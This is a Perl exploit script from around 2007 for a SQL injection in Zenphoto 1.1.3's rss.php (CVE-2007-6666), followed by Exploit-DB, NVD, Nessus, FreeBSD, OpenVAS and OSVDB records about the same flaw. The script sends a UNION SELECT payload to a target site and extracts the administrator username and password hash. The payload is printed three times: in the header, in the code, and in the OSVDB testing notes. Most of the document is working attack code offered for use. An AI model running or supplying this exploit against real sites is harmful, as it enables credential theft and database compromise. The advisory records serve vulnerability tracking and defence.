#!/usr/bin/perl -w
#################################################################################
# #
# Zenphoto 1.1.3 SQL Injection Exploit #
# #
# Discovered by: Silentz #
# Payload: Admin Username & Hash Retrieval #
# Website: http://www.w4ck1ng.com #
# #
# Vulnerable Code (rss.php): #
# #
# $albumnr = $_GET[albumnr]; #
# #
# if ($albumnr != "") #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE albumid = $albumnr #
# AND `show` = 1 ORDER BY id DESC LIMIT ".$items;} #
# else #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE `show` = 1 ORDER #
# BY id DESC LIMIT ".$items; } #
# #
# PoC: http://victim.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT #
# value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13) #
# ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, #
# 0,0,0,0/* #
# #
# Subject To: Nothing! #
# GoogleDork: Get your own! #
# #
# Shoutz: The entire w4ck1ng community #
# #
# NOTE: The vulnerbility exists in versions 1.1, 1.1.1, 1.1.2 & 1.1.3 BUT you'd #
# have to alter the payload in order to make it work for any versions #
# other than 1.1.3. #
# #
#################################################################################
use LWP::UserAgent;
die "Example: exploit.pl http://victim.com/\n" unless @ARGV;
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /<webMaster>(.*?)<\/webMaster>/){
print "\nBrought to you by w4ck1ng.com...\n";
print "\n[+] Admin User : $1";
}
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";}
else{print "\n[-] Exploit Failed...\n";}
# milw0rm.com [2007-12-31]
{"hash": "d3a3971100758a834c707acc1e8fba142319021e1693e31a53f4b6196c5d3601", "id": "EDB-ID:4823", "lastseen": "2016-01-31T21:51:07", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4823/", "description": "Zenphoto 1.1.3 (rss.php albumnr) Remote SQL Injection Exploit. CVE-2007-6666. Webapps exploit for php platform", "title": "Zenphoto 1.1.3 rss.php albumnr Remote SQL Injection Exploit", "sourceData": "#!/usr/bin/perl -w\n\n#################################################################################\n# #\n# Zenphoto 1.1.3 SQL Injection Exploit #\n# #\n# Discovered by: Silentz #\n# Payload: Admin Username & Hash Retrieval #\n# Website: http://www.w4ck1ng.com #\n# #\n# Vulnerable Code (rss.php): #\n# #\n# $albumnr = $_GET[albumnr];\t\t\t\t\t\t#\n# \t \t\t\t\t\t\t\t\t\t#\n# if ($albumnr != \"\")\t\t\t\t\t\t\t#\n#\t{ $sql = \"SELECT * FROM \". prefix(\"images\") .\" WHERE albumid = $albumnr #\n# AND `show` = 1 ORDER BY id DESC LIMIT \".$items;}\t\t\t#\n# else\t\t\t\t\t\t\t\t\t#\n# \t{ $sql = \"SELECT * FROM \". prefix(\"images\") .\" WHERE `show` = 1 ORDER \t#\n# BY id DESC LIMIT \".$items; }\t\t\t\t\t\t#\n# #\n# PoC: http://victim.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT #\n# value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13) # \n# ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, #\n# 0,0,0,0/*\t #\n# #\n# Subject To: Nothing!\t\t\t #\n# GoogleDork: Get your own! #\n# #\n# Shoutz: The entire w4ck1ng community #\n# #\n# NOTE: The vulnerbility exists in versions 1.1, 1.1.1, 1.1.2 & 1.1.3 BUT you'd #\n# have to alter the payload in order to make it work for any versions #\n# other than 1.1.3. \t\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n#################################################################################\n\nuse LWP::UserAgent;\ndie \"Example: exploit.pl http://victim.com/\\n\" unless @ARGV;\n\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n\n$host = $ARGV[0] . \"rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*\";\n\n$res = $b->request(HTTP::Request->new(GET=>$host));\n$answer = $res->content;\n\nif ($answer =~ /<webMaster>(.*?)<\\/webMaster>/){\n print \"\\nBrought to you by w4ck1ng.com...\\n\";\n print \"\\n[+] Admin User : $1\";\n}\n\nif ($answer =~/([0-9a-fA-F]{32})/){print \"\\n[+] Admin Hash : $1\\n\\n\";}\n\nelse{print \"\\n[-] Exploit Failed...\\n\";}\n\n# milw0rm.com [2007-12-31]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-6666"], "viewCount": 1, "published": "2007-12-31T00:00:00", "osvdbidlist": ["39786"], "references": [], "reporter": "Silentz", "modified": "2007-12-31T00:00:00", "href": "https://www.exploit-db.com/exploits/4823/"}
{"result": {"cve": [{"id": "CVE-2007-6666", "type": "cve", "title": "CVE-2007-6666", "description": "SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter.", "published": "2008-01-04T06:46:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6666", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-09-29T14:25:39"}], "nessus": [{"id": "FREEBSD_PKG_1A818749D64611DC8959000BCDC1757A.NASL", "type": "nessus", "title": "FreeBSD : zenphoto -- XSS vulnerability (1a818749-d646-11dc-8959-000bcdc1757a)", "description": "zenphoto project reports :\n\nA new zenphoto version is now available. This release contains security fixes for HTML, XSS, and SQL injection vulnerabilities.", "published": "2008-02-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=30241", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-10-29T13:44:28"}, {"id": "ZENPHOTO_ALBUMNR_SQL_INJECTION.NASL", "type": "nessus", "title": "Zenphoto rss.php albumnr Parameter SQL Injection", "description": "The version of Zenphoto installed on the remote host fails to sanitize input to the 'albumnr' parameter of the 'rss.php' script before using it in a database query. Regardless of PHP's 'magic_quotes_gpc' and 'register_globals' settings, an attacker may be able to exploit this issue to manipulate database queries, leading to disclosure of sensitive information, modification of data, or attacks against the underlying database.", "published": "2008-01-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=29832", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-10-29T13:41:27"}], "freebsd": [{"id": "1A818749-D646-11DC-8959-000BCDC1757A", "type": "freebsd", "title": "zenphoto -- XSS vulnerability", "description": "\nzenphoto project reports:\n\nA new zenphoto version is now available. This release contains\n\t security fixes for HTML, XSS, and SQL injection vulnerabilities.\n\t \n\n", "published": "2008-01-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vuxml.freebsd.org/freebsd/1a818749-d646-11dc-8959-000bcdc1757a.html", "cvelist": ["CVE-2007-6666"], "lastseen": "2016-09-26T17:24:58"}], "openvas": [{"id": "OPENVAS:60396", "type": "openvas", "title": "FreeBSD Ports: zenphoto", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2008-09-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=60396", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-07-02T21:10:21"}], "osvdb": [{"id": "OSVDB:39786", "type": "osvdb", "title": "Zenphoto rss.php albumnr Variable SQL Injection", "description": "## Vulnerability Description\nZenphoto contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'rss.php' script not properly sanitizing user-supplied input to the 'albumnr' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*\n## References:\n[Secunia Advisory ID:28281](https://secuniaresearch.flexerasoftware.com/advisories/28281/)\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4823\n[CVE-2007-6666](https://vulners.com/cve/CVE-2007-6666)\nBugtraq ID: 27084\n", "published": "2007-12-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:39786", "cvelist": ["CVE-2007-6666"], "lastseen": "2017-04-28T13:20:35"}]}}
